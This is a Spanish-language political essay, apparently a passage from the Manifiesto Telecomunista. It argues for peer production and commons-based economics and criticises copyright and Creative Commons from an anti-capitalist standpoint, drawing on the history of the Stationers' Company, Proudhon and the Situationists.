La creación de comunes bajo el reinado del capital no es un juego de suma cero. Esto significa que el hecho o la relación objetiva entre los comunes y el capital no constituye automáticamente una distinción pura y dura entre comunes capitalistas y anti-capitalistas. Los trabajadores asociados en la producción de pares tienen un interés natural en mantener y expandir los comunes del conocimiento, el código y el diseño. Bajo las condiciones del capital, el rol del trabajo asalariado y la inversión capitalista contribuyen a la sostenibilidad de los comunes y de los comuneros.

No obstante, bajo condiciones de crisis capitalista, los comuneros tienen un interés objetivo en mantener los comunes y las condiciones de participación que creen la máxima independencia del capital y abogan por su eventual reemplazo en tanto sistema dominante. Nosotros proponemos que esto puede suceder a través de la creación de entidades no capitalistas, comunitarias, orientadas al beneficio que participen en el intercambio de mercado sin participar en la acumulación de capital. Las instituciones orientadas al beneficio son responsables de la sostenibilidad financiera y la reproducción social de los comuneros, así como de la protección y el fortalecimiento de los comunes.

A través del uso de un nuevo tipo de licencia de producción de pares, los comuneros pueden compartir libremente los bienes comunes con entidades afines, mientras cobran a las entidades con fines de lucro que no reciprocan a los comunes, creando así un ciclo de realimentación positiva que genera una contra-economía centrada en los comunes. Bajo la crisis capitalista, resulta crucial para un período de transición combinar la emergente contra-economía y sus soluciones funcionales para los problemas de la reproducción social con los movimientos sociales más amplios que emergen para proteger las condiciones de vida de la clase trabajadora.

El trabajo tradicional y sus organizaciones tienen un interés objetivo, bajo las condiciones de un capitalismo declinante, en adoptar la idea de comunes de innovación compartidos globalmente y por lo tanto aliarse con la emergente y profundizadora producción de pares. En condiciones de conflicto social, las corporaciones capitalistas pueden ser transformadas en entidades auto-administradas bajo propiedad de los trabajadores, que crean sus propios comunes de conocimiento, código y diseño compartidos.

Los granjeros y trabajadores agrícolas tienen un interés similar en la creación de comunes de innovación compartida con el objetivo de transformar la agricultura industrial que agota el suelo en una eco-agricultura inteligente basada en esos mismos comunes que una a granjeros y trabajadores del conocimiento agrícola.

La producción de pares orientada a los comunes puede fortalecer sin embargo al capital redárquico y con él al sistema de acumulación de capital, además de la reproducción de los comunes. Los pares productores pueden beneficiar a las plataformas corporativas, mientras luchan por sus propios derechos en tanto creadores reales de valor y, al convertirse en fuerza social, podrían tomar tales plataformas como utilidades comunes o de propiedad pública.

Los participantes de entidades con fines de beneficio bajo control de los comuneros pueden trascender significativamente las dinámicas de mercado puramente competitivas, mientras evitan una planificación central autoritaria a través de la adopción de una administración a libro abierto y una adaptación a la señalización públicamente disponible, así como a través de la negociación coordinada de la producción y la distribución. Esto no ignora una posible necesidad de planeamiento democrático a través de la participación ciudadana, siempre que sea necesario y deseado. Sin embargo, crea amplias áreas de alineamiento mutuo de las capacidades productivas.

Las ideologías y movimientos tradicionales del movimiento laboral industrial quedaron asociados a la propiedad colectiva. La producción de pares abre la puerta a una propiedad más distribuida, donde los individuos pueden agregar libremente no sólo sus recursos productivos inmateriales, sino también sus recursos productivos materiales. Bajo esas condiciones, el posible abuso de la propiedad colectiva se balancea por la libertad individual de derivar los recursos productivos en esfuerzos alternativos.

La producción de pares es vital para la sostenibilidad y los métodos de producción amigables con la biósfera, ya que las comunidades de diseño abierto diseñan naturalmente para la sostenibilidad, pero también transforman el mismo proceso productivo, por ejemplo, para garantizar la participación y un acceso más distribuido a los recursos productivos. Combinado con el desarrollo de maquinaria más distribuida, así como de asignación de capital más distribuido, la producción de pares puede llevar a un nuevo sistema que combine la re-localización inteligente de los materiales con la innovación cooperativa global y la existencia de filés globales que unan entidades de producción de pares en una escala “material” global. Las filés son entidades transnacionales, que fomentan las comunidades, que crean una nueva capa de cooperación material post-capitalista.

El trabajo gratuito sólo es problemático bajo condiciones de precariedad y captura de capital (redárquico) no-recíproco. Bajo condiciones de solidaridad social, la participación ofrecida libremente a los proyectos de valor común es una actividad altamente emancipatoria.

Por su naturaleza hiperproductiva y su inherente sostenibilidad ecológica, la producción de pares se convierte en la condición para trascender el capitalismo. Su propia lógica, es decir la contribución libre a los comunes, administrada por asociaciones con fines de beneficio y hecha sostenible a través de emprendimientos con fines de beneficio de los comuneros mismos, crea la forma seminal de una nueva formación económica y social, centrada alrededor de la creación de valor de los comunes, administrada por y a la que contribuyen tanto asociaciones con fines de beneficio como coaliciones de emprendedores y sostenida por servicios colectivos participativos que forman la base de un nuevo modelo de Estado Socio, habilitando y empoderando la producción social como la razón principal de su existencia.

La hiperproductividad de la producción de pares la hace cuadrar con las condiciones duales de las fases de transición, esto es, la crisis del viejo modelo de producción y la disponibilidad de una alternativa funcional que puede desempeñarse mejor mientras resuelve una cantidad de problemas sistémicos que plagan la forma de producción dominante en la actualidad. La tarea de los movimientos del trabajo cognitivo y de otros tipos es crear una nueva hegemonía y una nueva alianza basada en los comunes para el cambio social, que desafíe la dominación del capital, su forma-mercancía y la destrucción biosférica que le es inherente.

Manifiesto Telecomunista

Publicada el 10/04/2020 - 02/08/2021 por Anonymous Chile

Contribución a la Crítica de la Cultura Libre

“Estamos en medio de una revolución de las formas en que el conocimiento y la cultura son creados, accedidos y transformados”, establece la “Carta por la Innovación, la Creatividad y el Acceso al Conocimiento”, algo así como un manifiesto del movimiento de la cultura libre (FCForum, s. f.). La revolución es contra un sistema de copyright que se desarrolló junto con el capitalismo y tiene como base a la explotación de los creadores. Es en el contexto de la gran disparidad de riqueza y la lucha entre clases que cualquier investigación sobre la producción cultural debe ser entendida.

Crear las condiciones para la expropiación de los creadores siempre ha sido la raíz del copyright. Esto ha sido el sujeto de crítica y disenso entre artistas y autores desde que existe la noción de derechos exclusivos sobre las ideas. Esto incluye a muchos que adhieren a una oposición completa al copyright, en la forma del anticopyright. El advenimiento de la cultura digital y la popularidad de la compartición de archivos han traído ciertas formas de tal disenso al mainstream, aunque muchas veces sin el contexto de la lucha de clases y cargados por la falsa concepción común de que el copyright fue creado para proteger a los productores culturales. Esto ha llevado a proyectos como Creative Commons, que profesa promover la creación de una cultura común, pero de hecho se autolimita a promover un modelo más flexible de propiedad privada.

Al unirse la producción de software con la producción cultural en la esfera de la creación de material digital reproducible, nuevas formas de disenso y organización emergen de las comunidades de creadores de software libre. El movimiento del Software Libre y en particular su tremendo éxito comercial produjo métodos y herramientas que han probado ser de gran valor para el movimiento de la cultura libre. Aunque también el movimiento del Software Libre ha creado algunas falsas concepciones, ya que los bienes económicos orientados al uso de los productores, como el software, son diferentes de los bienes para consumo, como los libros, películas y música. En orden a aplicar el poderoso modelo de las licencias copyleft, una forma de licenciamiento que garantiza la libertad de los derivados de las obras, las economías diferentes del software y la cultura deben tomarse en consideración y hacerse compatibles con la emancipación de la clase trabajadora en su conjunto. La cultura libre no puede sostenerse en una sociedad no libre, que necesita de los bienes de consumo para capturar ganancias. La cultura libre sólo puede realizarse en el contexto de una sociedad libre.

Mientras que el copyleft es muy efectivo en la creación de un dominio común de software, alcanzar un dominio común de las obras culturales requiere del copyfarleft, una forma de licenciamiento libre que niega el acceso libre a las organizaciones que mantienen sus propios activos por fuera del dominio común.

El copyright es un sistema de censura y explotación

La existencia de los “derechos de copia” es previa a las nociones sobre el derecho del autor a la propiedad del siglo XVIII.3 Desde el siglo XVI al XVII las licencias reales otorgaron derechos exclusivos a ciertos editores para la impresión de textos particulares. En 1557, un monopolio exclusivo sobre la impresión fue dado a través del Royal Charter al gremio londinense de los imprenteros, la Stationers’ Company, porque aseguraba el control de la Corona sobre los libros que se publicaban o se censuraban. Los primeros derechos de copia fueron los derechos de los editores a imprimir copias, emergiendo de las necesidades ideológicas de las monarquías absolutistas de controlar el conocimiento y censurar el disenso.

Después de que el Acta de Licenciamiento hubiera expirado en 1694, el monopolio de la Stationers’ Company se vio amenazado por los libreros provinciales, los llamados “piratas” de Irlanda y Escocia. La Stationers’ Company pidió al Parlamento una nueva acta para extender su monopolio sobre el copyright. Pero esta era una Inglaterra diferente a la de 1557, diferente del Parlamento que había ejecutado al rey Charles I en 1649, que abolió la monarquía e instaló una república bajo Cromwell, que restableció la monarquía con Charles II, destronó a James II en la Revolución de 1688 y, en 1689, pasó el primer decreto para una soberanía constitucional moderna, la Carta de Derechos. Esta era la Inglaterra de John Locke.

El filósofo John Locke se contaba entre los arquitectos maestros del Estado liberal y la ideología de la propiedad privada. Para Locke, la propiedad era la extensión de la propiedad sobre uno mismo. Al ser dueño de uno mismo, uno es dueño de lo que produce. El derecho a la propiedad es creado por el trabajo. El Parlamento inglés tomó una posición consistente con esta visión y el Estatuto de Ana, promulgado por el Parlamento en 1709, fue un duro embate para la Stationers’ Company. El Estatuto declaraba que los autores, no los editores, eran los dueños de sus obras y limitaban el término del copyright a catorce años para los libros nuevos y veintiuno para los copyright existentes. El Estatuto, subtitulado “Un Acta para la Promoción del Aprendizaje, Invistiendo las Copias de Libros Impresos en los Autores o los Compradores de tales Copias, Durante el Tiempo Debajo Mencionado”, creó un mercado para el conocimiento a través de la competencia. El objetivo del Estatuto no era crear un copyright para el autor, sino quebrar el monopolio de la Stationers’ Company.

Los jugadores principales, en lo que la prensa saludó como la gran causa de la propiedad literaria, no eran los autores. Los editores se demandaron entre sí en las cortes, invocando los derechos del autor como un pretexto en su batalla por el poder económico. La noción del autor como un originador, con un derecho natural a sus propias ideas, pudo haber sido inventada por artistas y filósofos, pero fueron los editores los que se beneficiaron. Las leyes no son hechas por poetas sino por estados y los estados existen para reforzar el privilegio económico, adoptando cualquier marco filosófico legitimador que encuentren conveniente. El Estatuto de Ana codificó la forma capitalista de la relación autor-editor. Los autores tenían derecho a poseer el producto de su trabajo en teoría, pero ya que lo que creaban eran ideas inmateriales y carecían de los medios tecnológicos para producir libros, debían vender sus derechos a terceros con el capital suficiente para explotarlos. En esencia, no era diferente de ninguna otra forma de trabajo. La explotación del autor está embebida en el régimen de propiedad intelectual desde su concepción.

Existen importantes diferencias entre las propiedades intelectual y física. La propiedad física es escasa y finita, mientras que la propiedad intelectual puede ser copiada, a menudo cuesta casi nada reproducirla y puede ser usada simultáneamente por cualquiera que posea una copia. Es exactamente esta característica de reproductibilidad ilimitada la que requiere que el régimen del copyright convierta la información en propiedad. En el largo plazo, el valor de cambio de cualquier bien reproducible es llevado hacia el costo de reproducción por la competencia. En otras palabras, la información no tiene un valor de cambio por sí misma. Entonces, los propietarios (de nuevo, no confundirlos con los productores) necesitan leyes que prevengan su reproducción.

Sólo al volver ilegal la reproducción de la información por terceros los propietarios pueden extraer renta por el derecho a copiarla. La propiedad intelectual, incluyendo al copyright, es una extensión de la estructura de la propiedad a los activos inmateriales y a la información. El copyright es la construcción legal que intenta hacer que ciertos tipos de riqueza inmaterial se comporten como la riqueza material para que puedan ser apropiadas, controladas y comerciadas.

En cualquier sistema de propiedad, los músicos no pueden retener la propiedad sobre el producto de su trabajo más que lo que pueden los trabajadores de cualquier taller textil clandestino. El sistema del control privado de los medios de publicación, distribución, promoción y producción mediática asegura que los artistas y todos los demás trabajadores creativos no puedan ganar más que lo necesario para su subsistencia. Seas un bioquímico, un músico, un ingeniero de software o un cineasta, has cedido todos tus derechos de copia en un contrato a los propietarios antes de que esos derechos posean algún valor financiero real, por no más del costo de reproducción de tu trabajo.

Pierre-Joseph Proudhon, socialista francés decimonónico y la primera persona en llamarse a sí misma “anarquista”, argumentó que la propiedad es el robo. De acuerdo con esta lógica, si la propiedad es el robo, entonces la propiedad intelectual es un fraude. La propiedad no es el robo en el sentido estrictamente legal, ya que las leyes del Estado capitalista liberal son el fundamento de la Propiedad. La propiedad es el robo en el sentido filosófico, porque es intrínsecamente injusto tomar lo que no has producido. Proudhon, como Thompson y Hodsgkin antes que él, argumenta que el propietario no puede reclamar legítimamente el producto de aquellos que ponen su propiedad a producir (Proudhon, 1890). Sin el recurso de la fuerza, los propietarios no pueden extraer más que los costos de reproducción de los instrumentos que contribuyen al proceso productivo. Una clase capitalista entonces no puede existir sin negar a los trabajadores el acceso independiente a los medios de producción.

En palabras del anarco-individualista estadounidense Benjamin Tucker, “el que presta capital tiene asegurado su retorno intacto y nada más” (Tucker, 1926). Ya que las tierras comunes no se consideraban propiedad, cuando a los campesinos de la era pre-industrial se les negó el acceso por medio de cercamientos, puede decirse que su tierra fue robada. Aún más, cuando fueron forzados hacia el trabajo asalariado como resultado de esta expropiación, la institución de la propiedad misma se convirtió en la institución del robo.

Pero si la propiedad física puede ser robada, ¿pueden robarse la inteligencia o las ideas? Si tu tierra es robada, ya no podés usarla, excepto bajo las condiciones que imponga el nuevo propietario. Si la propiedad de una idea es análoga a la propiedad material, debe estar sujeta a las mismas condiciones del intercambio económico, decomisación y embargo. Y si es embargado, entonces deja de ser la propiedad de su dueño. Pero si tu idea es usada por otros, no has perdido la habilidad para usarla, ¿entonces qué es lo que fue robado en realidad? La noción tradicional de la propiedad, como algo que puede ser poseído excluyendo a otros es irreconciliable con algo tan intangible como una idea. Al contrario de un objeto material, que puede existir en un único lugar en un tiempo determinado, las ideas son infinitas y no excluyentes. Un poema no deja de ser el poema de un poeta, aunque exista en la memoria de otros miles.

Toda expresión es extensión de una percepción previa. Las ideas no son originales, se construyen sobre capas de conocimiento acumulado a través de la historia. De estas capas comunes los artistas crean obras que incluyen sus inconfundibles especificidades e innovaciones propias. Todas las obras creativas re-ensamblan ideas, palabras e imágenes de la historia y de su contexto contemporáneo. Antes del siglo XVIII, los poetas citaban a sus ancestros y fuentes de inspiración sin reconocimiento formal y los guionistas tomaban libremente los argumentos y diálogos de fuentes anteriores, sin atribución. Homero basó la “Ilíada” y la “Odisea” en tradiciones orales con siglos de antigüedad. La “Eneida” de Virgilio está basada fuertemente en Homero. Shakespeare tomó muchos de sus argumentos narrativos y diálogos de Holinshed.

Esto no quiere decir que el concepto de plagio no existiera antes del siglo XVIII, pero su definición cambió radicalmente. El término plagiador (literalmente, secuestrador) fue usado por Marcial en el siglo I para describir a alguien que secuestraba sus poemas copiándolos completos y haciéndolos circular bajo su propio nombre. El plagio es la falsa asunción de la obra de otro. Pero si una obra nueva contenía pasajes similares o expresiones idénticas a otras más tempranas, no se consideraba como tal asunción, mientras que la nueva obra poseyera sus propios méritos estéticos. Luego de la invención del genio creativo, las prácticas de colaboración, apropiación y transmisión fueron olvidadas activamente. Las acusaciones de plagio dirigidas a Coleridge, Stendhal, Wilde y T. S. Eliot por incluir expresiones de sus predecesores en sus obras reflejaban la redefinición moderna del término siguiendo a las nociones modernas de autoría y propiedad exclusiva.

Las ideas son virales. Se acoplan a otras ideas, cambian de forma y migran hacia territorios desconocidos. Los regímenes de propiedad intelectual restringen la promiscuidad de las ideas y las atrapan en cercamientos artificiales, extrayendo beneficios exclusivos a través de su propiedad y control. La propiedad intelectual es el fraude, un privilegio legal para representarse falsamente como el único “propietario” de una idea, expresión o técnica y cobrar tarifa a todos aquellos que quieran percibir, expresar o aplicar esta “propiedad” en sus propias prácticas productivas. No es el plagio el que desposee a un “propietario” de una idea, es la propiedad intelectual, apoyada por la invasiva violencia de un Estado que desposee a todos del uso de su cultura común.

La base de esta desposesión es la ficción legal de que el autor es el soberano individual que crea obras originales del manantial de su imaginación y por lo tanto tiene un derecho natural a su propiedad. Foucault desenmascaró la autoría como un principio funcional que impide la libre circulación, manipulación, composición, decomposición y recomposición del conocimiento (Macmillan, 2007). El autor-función representa una forma de despotismo sobre la proliferación de ideas. El efecto de este despotismo y del sistema de propiedad intelectual que este protege y preserva, es que nos roba nuestra memoria cultural, censura nuestras palabras y encadena nuestra imaginación a la ley. Y sin embargo los artistas continúan halagándose con su asociación al mito del genio creativo, haciendo ojos ciegos al modo en que es utilizado para justificar su explotación y expandir el privilegio de la elite propietaria.

El copyright pone a un autor contra otro en una guerra de competencia por la originalidad. Sus efectos no son sólo económicos; el copyright también naturaliza un cierto proceso de producción de conocimiento, deslegitimiza la noción de una cultura común y daña las relaciones sociales. Los artistas no son incentivados a compartir sus pensamientos, expresiones y obras, o a contribuir a un pozo común de creatividad. En su lugar, se ven obligados a proteger celosamente su “propiedad” de los demás, a los que ven como potenciales competidores, espías y ladrones esperando para robar y violar sus originales ideas. Esta es una visión sobre el mundo del arte creada a imagen del capitalismo, un capitalismo que busca apropiarse del producto alienado de sus trabajadores intelectuales y creativos.

Joost Smiers, Profesor Emérito en Ciencia Política de las Artes en la Escuela de Artes de Utrecht, se cuenta entre aquellos que insisten en la abolición del copyright. Argumenta que el copyright centraliza la propiedad de los medios al entregarle a los grandes conglomerados mediáticos una ventaja anti-competitiva que daña la posición de los artistas. Los artistas ganarían más en un campo de juego parejo que consista de un gran número de editores compitiendo por sus servicios, que de la exclusividad del copyright (Smiers & Schijndel, 2009). El profesor Smiers tiene un punto válido respecto a la ineficiencia de mercado del copyright. El copyright debería ser abolido. No obstante, no hay razón para creer que lo será.

El copyright está lejos de ser la única ineficiencia del mercado en el mercado capitalista contemporáneo. Sin las ineficiencias del mercado, el capital no sería capaz de capturar más que su propio costo de reproducción en cualquier rama de la industria. La eliminación de la competencia es central para la lógica del capitalismo. Sin ventajas injustas, una clase capitalista de propietarios no podría acumular riqueza y no podría haber capitalismo alguno. Smiers tiene razón en su crítica al copyright, también está en lo correcto cuando denuncia el copyright como una forma de censura. Sin embargo, como toda idea política, la abolición del copyright sólo puede implementarse cuando aquellos que la apoyan superan en riqueza a aquellos que la oponen. Actualmente este no es el caso.

La propiedad privada de las ideas durante los últimos dos siglos no ha logrado erradicar la memoria de una cultura común o el reconocimiento de que el conocimiento florece cuando las ideas, palabras, sonidos e imágenes son libres para el uso de todos. Desde el mismo nacimiento del autor propietario, diferentes individuos y grupos han desafiado el régimen de propiedad intelectual y el “derecho” que daba a algunos individuos privados a “poseer” obras creativas mientras impide a otros a usarlas y re-interpretarlas.

En su “Poesías” de 1870, un par de textos descubiertos y reverenciados por los surrealistas Louis Aragon y André Breton, el Conde de Lautreamont, poeta francés nacido en Uruguay, llamaba al regreso de una poesía impersonal, una poesía escrita por todos. “El plagio es necesario”, decía Lautreamont, “el progreso depende de eso. Toma la frase de un autor, usa sus expresiones, borra una falsa idea, la reemplaza por una verdadera” (Khayati, 1966). Su definición subvertía el mito de la creatividad individual usado para justificar las relaciones de propiedad en nombre del progreso, cuando en realidad el mito de la creatividad individual impedía el progreso a través de la privatización de la cultura. La respuesta natural era re-apropiarse de la cultura como una esfera de producción colectiva sin reconocer cercamientos artificiales de autoría. La frase de Lautreamont se volvió un punto de referencia para las vanguardias del siglo XX. Dadá rechazó la originalidad y retrató a toda la producción artística como reciclaje y reensamblado, desde los ready-made de Duchamp a la regla de Tzará para hacer poemas con recortes de diario y los fotomontajes de Höch, Hausmann y Heartfield. Dadá también desafió la idea del artista como un genio solitario y del arte como una esfera separada, trabajando colectivamente para producir no sólo objetos y textos artísticos, sino también hoaxes4 mediáticos, intervenciones en encuentros políticos y manifestaciones callejeras. Su ataque a los valores artísticos fue una revuelta contra los fundamentos capitalistas que los habían creado.

Las ideas del dadaísmo fueron desarrolladas sistemáticamente en una teoría por la Internacional Situacionista (IS). La IS reconoció que la práctica del détournement5, es decir poner obras, películas, publicidades y cómics existentes en un desvío (detour) o recodificar sus significados predominantes, estaba en deuda con las prácticas dadaístas, pero con una diferencia. Vieron a Dadá como una crítica negativa de las imágenes dominantes (una que dependía del fácil reconocimiento de la imagen negada) y definieron el detournement como una reutilización positiva de fragmentos existentes, simplemente como elementos en la producción de una nueva obra. El detournement no era primariamente un antagonista de la tradición; más precisamente, enfatizaba la reinvención de un mundo nuevo a partir de los restos del viejo. E implícitamente, la revolución no era principalmente una insurrección contra el pasado sino una forma de aprender a vivir en una forma diferente, creando nuevas prácticas y formas de comportamiento. Estas formas de comportamiento incluían la escritura colectiva, a menudo no firmada y un rechazo explícito al régimen de copyright al añadir las etiquetas “sin copyright” o “anticopyright” a sus obras, junto con instrucciones para su uso como: todos los textos de este libro pueden reproducirse, traducirse o adaptarse libremente, incluso sin mencionar la fuente.

La digitalización ha probado ser mucho más amenazante para las nociones convencionales de autoría y propiedad intelectual que el plagio practicado por los artistas radicales o las críticas del autor de los teóricos posestructuralistas. La computadora disuelve los límites esenciales para la ficción moderna del autor como un creador solitario de obras únicas y originales. La propiedad presupone una separación entre los textos y entre el autor y el lector. La artificialidad de esta separación se está volviendo aparente. En las listas de correo, grupos de noticias y sitios de publicación abierta, la transición de lector a escritor es natural y la diferencia entre los textos originales se desvanece cuando los lectores contribuyen comentarios e incorporan fragmentos del original en sus respuestas sin utilizar entrecomillado. Los intentos de implementar copyright a la escritura en línea se muestran cada vez más absurdos, por lo que los textos son frecuentemente producidos en forma colectiva e inmediatamente multiplicados. Mientras la información en línea circula sin importar las convenciones del copyright, el concepto del autor propietario realmente parece haberse vuelto un fantasma del pasado. Tal vez el efecto más importante de la digitalización es que amenaza a los benefactores tradicionales de la propiedad intelectual ya que el control monopólico de los editores de libros, sellos musicales y la industria fílmica ya no es necesario cuando la gente común toma los medios de producción y distribución en sus propias manos.

Los anti-comunes creativos

El surgimiento del Software Libre, la compartición de archivos y las formas artísticas basadas en el sampleo y reutilización de otros medios ha creado un serio problema para el sistema de copyright tradicional. Las industria de la música y el cine, en particular, se encuentran en el medio de una guerra a todo o nada contra sus propios consumidores para prohibirles descargar y samplear su propiedad, su copyright. Resulta claro que las tecnologías de redes digitales plantean un serio problema para las industrias discográficas y fílmicas. El disenso hacia las restricciones del copyright ha tenido una rica historia entre los artistas de vanguardia, productores de zines, músicos radicales y la marginalidad contracultural. Al día de hoy, la lucha contra la propiedad intelectual es liderada por abogados, profesores y miembros del gobierno. No sólo el estrato social al que pertenecen los jugadores principales es muy diferente, un hecho que, por sí mismo, puede no ser un detalle particularmente importante, sino que también el marco para la lucha contra la propiedad intelectual ha cambiado completamente.

Antes de que profesores de leyes como Lawrence Lessig se interesaran en la propiedad intelectual, el discurso entre los disidentes era en contra de toda propiedad sobre los comunes, intelectuales o físicos. Ahora, los que apoyan la propiedad y el privilegio económico están en el centro del escenario. El argumento ya no es que el autor es una ficción y que la propiedad es el robo, sino que la legislación de la propiedad intelectual necesita contenerse y reformarse porque ahora avanza sobre los derechos de los creadores. Lessig critica los cambios recientes en la legislación del copyright que las corporaciones de medios globales y sus poderosos lobbies han impuesto, la absurda duración a la que se ha extendido el copyright y otras perversiones que restringen la creatividad de los artistas. Pero no cuestiona el copyright como tal, ya que lo ve como el más importante incentivo para crear que tienen los artistas. El objetivo aquí es defenderse del extremismo y del absolutismo en la propiedad intelectual, mientras se preservan los efectos benéficos.

En su conferencia maestra para Wizards of OS4 en Berlín, Lessig celebraba la cultura de lecto-escritura de la compartición libre y autoría colaborativa que ha sido la norma en gran parte de la historia. Durante el último siglo, explicaba Lessig, esta cultura de lecto-escritura se ha visto frustrada por la legislación de propiedad intelectual y convertida en una cultura de solo-lectura, dominada por un régimen de control del productor (Lessig, 2006). Lessig lamenta que las farsas recientes de la legislación del copyright hayan censurado el trabajo de artistas del remix como DJ Danger Mouse (The Grey Album) y Javier Prato (Jesus Christ: The Musical). Ambos artistas fueron torpedeados por los propietarios legales de la música utilizada en la producción de sus obras, tal como John Oswald y Negativland lo fueron antes que ellos. En estos casos, los deseos de los artistas, vistos como meros consumidores por la ley, fueron subordinados al control de los productores –The Beatles y Gloria Gaynor respectivamente– y sus representantes legales. El problema es que el control del productor está creando una cultura de solo-lectura y destruyendo la vitalidad y diversidad de la producción creativa. Está promoviendo los intereses estrechos de unos pocos “productores” privilegiados a expensas de todos los demás.

Lessig contrasta el control del productor con los comunes culturales (un stock común de valor que todos pueden utilizar y al que pueden contribuir). Los comunes niegan el control del productor e insisten en la libertad de los consumidores. Lo “libre” de la cultura libre refiere a la libertad natural de los consumidores a usar un stock cultural común y no a la libertad hecha cumplir por el Estado de los productores para controlar el uso de “sus” obras. En principio, la noción de un común cultural suprime la distinción entre productores y consumidores, viéndolos como actores iguales en un proceso continuo.

Hoy, en el contexto específico del proyecto Creative Commons (CC), Lessig proclama que la posibilidad de una cultura de lecto-escritura ha renacido. ¿Pero es Creative Commons realmente un dominio común? Según su sitio web, Creative Commons define el espectro de posibilidades entre el copyright completo (todos los derechos reservados) y el dominio público (ningún derecho reservado). Creative Commons también ofrece licencias que ayudan a mantener el copyright mientras invitan a ciertos usos de la obra, un copyright de “algunos derechos reservados”. El punto es claro: Creative Commons existe para ayudarte a “vos”, como productor, a mantener el control de “tu” obra. Te invita a elegir entre un rango de restricciones que deseas aplicar a “tu” obra, como prohibir la duplicación, prohibir las obras derivadas o prohibir el uso comercial. Se asume que, como autor-productor, todo lo que hagas y digas es de tu propiedad. El derecho del consumidor nunca es mencionado, como tampoco se disputa la distinción entre productores y consumidores. Creative Commons legitimiza, no niega, el control del productor y refuerza, no suprime, la distinción entre productor y consumidor. Expande el marco legal para que los productores nieguen a los consumidores la posibilidad de crear valor de uso o valor de cambio del stock común.

El problema de crear “escrituras comunes” para obras que no están realmente entre las existencias comunes es típico del abordaje copy-just-right (apenas derecho de copia) tipificado por Creative Commons. Si The Beatles o Gloria Gaynor hubieran publicado sus obras en el marco de Creative Commons, también habría sido su elección y no la de DJ Danger Mouse o Javier Prato, si The Grey Album o Jesus Christ: The Musical debieran tener permiso para existir. Los representantes legales de The Beatles o Gloria Gaynor fácilmente podrían haber utilizado licencias CC para reforzar su control sobre el uso de sus obras. El problema real del control de los productores presentado por Lessig no se resuelve con la “solución” Creative Commons mientras el productor posea un derecho exclusivo para elegir el nivel de libertad cedido al consumidor, un derecho que Lessig nunca ha cuestionado. La misión de Creative Commons de permitir a los productores la “libertad” de elegir los niveles de restricción para publicar sus obras contradice las condiciones reales de una producción basada en los comunes. Lessig no tiene ninguna base para usar a DJ Danger Mouse y Javier Prato como ejemplos para promover la causa de Creative Commons.

Asimismo, la celebración de Lessig del movimiento del Software Libre suena falsa, porque su arquitectura asegura a todos (tanto tecnológica como legalmente, en la forma de sus licencias) la posibilidad de usar el recurso común que es el código fuente. A pesar de clamar que extiende los principios del movimiento del Software Libre, la libertad que Creative Commons da los creadores para elegir la forma en que sus obras son utilizadas es muy diferente de la libertad que la Licencia Pública General (GPL), inventada por el gurú del software libre Richard Stallman, da a los usuarios para copiar, modificar y distribuir el software mientras la misma libertad se mantenga. Stallman ha declarado recientemente su rechazo completo a Creative Commons porque algunas de sus licencias son libres mientras que otras no, argumentando que confunde a la gente a interpretar la etiqueta común como algo sustancial, cuando en realidad no existe un estándar común ni una posición ética detrás de dicha etiqueta (DaBlade, 2006).

Mientras que el copyleft reclama legalmente la propiedad sólo para rechazarla en la práctica, las referencias a la propiedad que hace Creative Commons son genuinas, no irónicas. Las licencias de Creative Commons permiten restricciones arbitrarias a la libertad de los usuarios basadas en las preferencias o gustos particulares del autor. En este sentido, Creative Commons es una versión más elaborada del copyright. No desafía el régimen del copyright íntegramente, ni preserva su coraza legal para poner la práctica del copyright sobre su cabeza, como hace el copyleft.

Tanto el dominio público como el anti-copyright y el copyleft son intentos de crear un común, un espacio compartido de no-propiedad que es libre para el uso de todos. Las condiciones de uso pueden diferir, de acuerdo a varias interpretaciones de derechos y responsabilidades, pero estos derechos son derechos comunes y los recursos se comparten del mismo modo por la comunidad entera. Su uso no está garantizado arbitrariamente en base a un análisis caso por caso de acuerdo a los caprichos de los miembros individuales, como el abordaje de Creative Commons. El surtido de bienes culturales de Creative Commons no es mantenido en común, porque es la elección de los autores individuales permitir su uso o negarlo. Entonces, Creative Commons es un anti-común que encubre la lógica capitalista de privatización bajo un nombre engañoso elegido deliberadamente. Su propósito es ayudar a los dueños de la “propiedad intelectual” a alcanzar el rápido paso del intercambio de información, no mediante la liberación de la información, sino al proveerles definiciones más sofisticadas para las varias gamas de propiedad y control del productor.

Lo que empezara como un movimiento por la abolición de la propiedad intelectual se ha convertido en un movimiento para personalizar las licencias de los propietarios. Casi sin notarlo, lo que fue un movimiento de radicales, hackers y piratas es ahora el dominio de reformistas, revisionistas y apologistas del capitalismo. Cuando el capital es amenazado, coopta a la oposición. Hemos visto este escenario muchas veces en la historia. De hecho, uno de los más espectaculares ejemplos de tal cooptación fue la transformación de consejos auto-organizados de obreros en un movimiento sindical que negocia contratos legales con los propietarios de las corporaciones. Creative Commons es una subversión similar que no cuestiona el “derecho” a la propiedad privada, sino que en cambio trata de obtener pequeñas concesiones en un campo de juego donde el juego mismo y sus reglas están determinadas por adelantado. El efecto real de Creative Commons es estrechar la respuesta política dentro de la esfera de lo que es permisible en la actualidad.

Mientras estrecha este campo de respuesta, Creative Commons simultáneamente se retrata como radical, la vanguardia de la batalla contra la propiedad intelectual. Creative Commons se ha convertido en un tipo de ortodoxia por defecto en el licenciamiento no comercial y una causa popular entre los artistas e intelectuales que se consideran generalmente de izquierda, en contra del régimen de propiedad intelectual en general.

La marca Creative Commons es invocada moralmente en muchos sitios, blogs, discursos, ensayos, obras artísticas y piezas musicales como si constituyera la condición necesaria y suficiente de la revolución próxima por una verdadera “cultura libre”. Creative Commons es parte de un movimiento más grande de copyfight (lucha por la copia), que se define como una lucha para abolir la “propiedad intelectual” y regresar a los principios míticos de una legislación del copyright pre-corrupta que fue planeada “genuinamente” para proteger los derechos de los autores. Los individuos y grupos asociados a este movimiento militan por lo que llaman una “propiedad intelectual más inteligente” o una reforma de la propiedad intelectual que no amenace la libertad de expresión, la democracia, la competencia, innovación, educación, progreso de las ciencias y otras cosas que son críticamente importantes para nuestro bienestar social, cultural y económico.

